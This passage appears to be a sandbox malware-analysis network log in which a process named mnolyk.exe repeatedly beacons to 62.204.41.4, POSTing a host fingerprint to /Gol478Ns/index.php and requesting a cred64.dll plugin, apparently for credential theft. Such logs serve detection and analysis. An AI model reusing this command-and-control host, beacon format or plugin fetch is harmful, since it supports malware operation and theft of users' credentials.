                                                                      Feb 7, 2023 23:10:27.581918955 CET805046762.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:27.584702969 CET805046762.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:27.584819078 CET5046780192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:27.704570055 CET5046780192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:27.705624104 CET5046880192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:27.766271114 CET805046862.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:27.766448021 CET5046880192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:27.766830921 CET5046880192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:27.766974926 CET805046762.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:27.767066002 CET5046780192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:27.827429056 CET805046862.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:27.829786062 CET805046862.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:27.829921007 CET5046880192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:27.974126101 CET5046880192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:27.976979971 CET5046980192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:28.035125017 CET805046862.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:28.035342932 CET5046880192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:28.037348032 CET805046962.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:28.037535906 CET5046980192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:28.062597036 CET5046980192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:28.123147964 CET805046962.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:28.126764059 CET805046962.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:28.126939058 CET5046980192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:28.234428883 CET5046980192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:28.235668898 CET5047080192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:28.294887066 CET805046962.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:28.294990063 CET5046980192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:28.297275066 CET805047062.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:28.297382116 CET5047080192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:28.297772884 CET5047080192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:28.359241962 CET805047062.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:28.361551046 CET805047062.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:28.361676931 CET5047080192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:28.468485117 CET5047080192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:28.470855951 CET5047180192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:28.530258894 CET805047062.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:28.530354977 CET5047080192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:28.533632040 CET805047162.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:28.533761024 CET5047180192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:28.534173965 CET5047180192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:28.596872091 CET805047162.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:28.599333048 CET805047162.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:28.599471092 CET5047180192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:28.718164921 CET5047180192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:28.718916893 CET5047280192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:28.780381918 CET805047262.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:28.780502081 CET5047280192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:28.780920029 CET805047162.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:28.781018019 CET5047280192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:28.781122923 CET5047180192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:28.842305899 CET805047262.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:28.845155001 CET805047262.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:28.845257998 CET5047280192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:28.952999115 CET5047280192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:28.953600883 CET5047380192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:29.015202045 CET805047262.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:29.015232086 CET805047362.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:29.015357018 CET5047380192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:29.015360117 CET5047280192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:29.015985966 CET5047380192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:29.077548981 CET805047362.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:29.081521988 CET805047362.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:29.081589937 CET5047380192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:29.205411911 CET5047380192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:29.206250906 CET5047480192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:29.267031908 CET805047362.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:29.267220020 CET5047380192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:29.267703056 CET805047462.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:29.267828941 CET5047480192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:29.268969059 CET5047480192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:29.330379963 CET805047462.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:29.332952976 CET805047462.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:29.333046913 CET5047480192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:29.439646006 CET5047480192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:29.444730997 CET5047580192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:29.501277924 CET805047462.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:29.503384113 CET5047480192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:29.506246090 CET805047562.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:29.508888960 CET5047580192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:29.511990070 CET5047580192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:29.573390961 CET805047562.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:29.575716972 CET805047562.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:29.577085972 CET5047580192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:29.687033892 CET5047580192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:29.687849045 CET5047680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:29.748725891 CET805047562.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:29.748852968 CET5047580192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:29.749073982 CET805047662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:29.753123045 CET5047680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:29.753559113 CET5047680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:29.814680099 CET805047662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:29.817495108 CET805047662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:29.819171906 CET5047680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:29.936057091 CET5047680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:29.936989069 CET5047780192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:29.996253967 CET805047762.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:29.997380972 CET805047662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:29.997665882 CET5047680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:29.999027014 CET5047780192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:29.999027967 CET5047780192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:30.058387995 CET805047762.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:30.062169075 CET805047762.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:30.063122034 CET5047780192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:30.171015024 CET5047780192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:30.172029018 CET5047880192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:30.230411053 CET805047762.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:30.231025934 CET5047780192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:30.233484030 CET805047862.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:30.233639956 CET5047880192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:30.234168053 CET5047880192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:30.295481920 CET805047862.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:30.297786951 CET805047862.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:30.297868013 CET5047880192.168.2.762.204.41.4
                                                                      • 62.204.41.4
                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      0 | 192.168.2.7 | 49694 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:00.567050934 CET | 8 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:00.630398035 CET | 9 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:00 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      1 | 192.168.2.7 | 49695 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:00.567383051 CET | 9 | OUT | GET /Gol478Ns/Plugins/cred64.dll HTTP/1.1
                                                                      Host: 62.204.41.4
                                                                      Feb 7, 2023 23:07:00.628043890 CET | 9 | IN | HTTP/1.1 404 Not Found
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:00 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 162
                                                                      Connection: keep-alive
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      10 | 192.168.2.7 | 49704 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:03.968547106 CET | 114 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:04.032342911 CET | 114 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      100 | 192.168.2.7 | 49795 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:27.539097071 CET | 215 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:27.602813005 CET | 215 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:27 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      101 | 192.168.2.7 | 49796 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:27.783129930 CET | 216 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:27.845711946 CET | 216 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:27 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      102 | 192.168.2.7 | 49797 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:28.024523973 CET | 217 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:28.090460062 CET | 217 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      103 | 192.168.2.7 | 49798 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:28.267776012 CET | 218 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:28.331127882 CET | 218 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      104 | 192.168.2.7 | 49799 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:28.505366087 CET | 219 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:28.567754984 CET | 219 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      105 | 192.168.2.7 | 49800 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:28.753248930 CET | 220 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:28.817456007 CET | 220 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      106 | 192.168.2.7 | 49801 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:28.990557909 CET | 221 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:29.054677963 CET | 221 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:29 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      107 | 192.168.2.7 | 49802 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:29.225909948 CET | 222 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:29.289135933 CET | 222 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:29 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      108 | 192.168.2.7 | 49803 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:29.455828905 CET | 223 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:29.520322084 CET | 223 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:29 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      109 | 192.168.2.7 | 49804 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:29.696239948 CET | 224 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
